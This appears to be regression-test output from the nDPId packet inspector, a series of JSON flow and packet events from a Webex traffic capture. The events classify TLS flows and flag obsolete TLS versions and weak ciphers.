+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1444570640365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640365,"pkt":"ABoRAAACABoRAAABCABFAAA8YQpAAEAGkVoKCAABch3MMcncAbvjbaL+AAAAAKACOQiv9QAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1444570640373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640373,"pkt":"ABoRAAACABoRAAABCABFAAA8S49AAEAGO34KCAABQERpYpETAbtLyIh5AAAAAKACOQgvkgAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640382,"flow_last_seen":1444570640382,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640382,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1444570640382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640382,"pkt":"ABoRAAACABoRAAABCABFAAA8O9hAAEAGNk0KCAABUEpuRILnAbv7u\/+DAAAAAKACOQgB2AAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAAoAgBAABAGoDlQSm5ECggAAQG7gucERAB8+7v\/hFAS\/\/9imAAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640385,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640385,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1444570640385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAA8smJAAEAGv8IKCAABUEpuRILoAbtZhnY\/AAAAAKACOQgtTwAAAgQFtAQCCAoATMRdAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1444570640389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAAoAgFAABAGoDhQSm5ECggAAQG7guimeYnAWYZ2QFAS\/\/9ilwAA"} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} 
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} 
+00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} 
+00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669745,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669745,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 